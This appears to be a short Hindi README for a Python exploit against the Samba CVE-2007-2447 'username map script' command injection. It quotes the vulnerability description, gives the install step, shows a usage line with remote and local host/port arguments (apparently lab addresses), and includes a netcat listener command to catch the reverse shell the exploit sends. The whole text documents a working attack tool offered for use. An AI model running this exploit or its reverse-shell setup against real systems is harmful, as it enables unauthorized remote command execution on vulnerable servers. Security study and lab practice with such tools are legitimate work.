
Python एक्सप्लॉइट Samba CVE-2007-2447 username map script रिमोट कमांड निष्पादन के लिए, जो एक कॉन्फ़िगर करने योग्य रिमोट लिसनर को रिवर्स शेल पेलोड पहुंचाता है।
"Samba 3.0.0 से 3.0.25rc3 तक smbd में MS-RPC कार्यक्षमता, दूरस्थ आक्रमणकारियों को शेल मेटाकैरेक्टर के जरिए मनमाने कमांड निष्पादित करने की अनुमति देती है, जिसमें (1) SamrChangePassword फंक्शन शामिल है, जब "username map script" smb.conf विकल्प सक्षम होता है, और दूरस्थ प्रमाणित उपयोगकर्ताओं को अन्य MS-RPC फंक्शन में शेल मेटाकैरेक्टर के जरिए कमांड निष्पादित करने की अनुमति देती है, जिसमें (2) रिमोट प्रिंटर और (3) फ़ाइल शेयर प्रबंधन शामिल है।"
[*] इस एक्सप्लॉइट के लिए Python 3.7 या उच्चतर आवश्यक है
python3 -m pip install pysmb
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
--rhost -- रिमोट होस्ट--lhost -- स्थानीय होस्ट--lport -- स्थानीय पोर्ट--rport -- रिमोट पोर्ट [*] वैकल्पिक। डिफ़ॉल्ट=445अपना लिसनर शुरू करना न भूलें:
nc -lvnp 4444
